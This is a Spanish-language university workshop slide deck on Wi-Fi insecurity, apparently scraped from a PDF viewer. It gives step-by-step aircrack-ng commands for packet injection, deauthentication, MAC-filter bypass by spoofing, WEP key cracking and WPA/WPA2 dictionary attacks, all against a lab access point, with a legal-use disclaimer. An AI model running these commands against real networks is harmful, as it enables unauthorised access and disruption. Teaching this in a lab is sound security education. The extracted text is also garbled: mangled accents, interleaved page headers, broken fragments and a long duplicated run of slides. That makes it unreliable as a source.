bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 3: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 394

Atencioacuten

bull Las herramientas y teacutecnicas que se presentaraacuten eneste taller serviraacuten para conocer y evaluar lavulnerabilidad de una WLAN y asiacute desarrollar lamejor estrategia para remediar dichasvulnerabilidades

bull Estas herramientas y teacutecnicas no se deben deutilizar para fines ilegales y sin el

consentimiento de la institucioacuten a evaluar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 494

Agenda

bull Conceptos de Seguridadbull Conociendo BackTrack

bull Armando el Laboratorio

bull Seguridad WLAN

bull Saltaacutendose la autenticacioacuten WLAN

bull

Fallas de encripcioacuten WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594

I- Conceptos de Seguridad

bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)

bull Se pretende tener ndash Confidencialidad

ndash Integridad

ndash Disponibilidad

bull Datos en proceso almacenados o en traacutensito

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694

Riesgo

bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida

bull El riesgo no se elimina

ndash

Aceptar el Riesgo ndash Minimizar el Riesgo

ndash Transferir el Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794

Amenaza

bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u

organizacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894

Amenazas

Password cracking

Man in the middle

Exploits

Denegacioacuten de servicio

Escalamiento de privilegios

Hacking de Centrales Telefoacutenicas

Keylogging Port scanning

Puertos vulnerables abiertos

Servicios de log inexistentes o que no son revisados

Desactualizacioacuten

Backups inexistentes

Uacuteltimos parches no instalados

Violacioacuten de la privacidad de los empleados

Destruccioacuten de equipamiento

Desastres naturales

Usuarios internos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

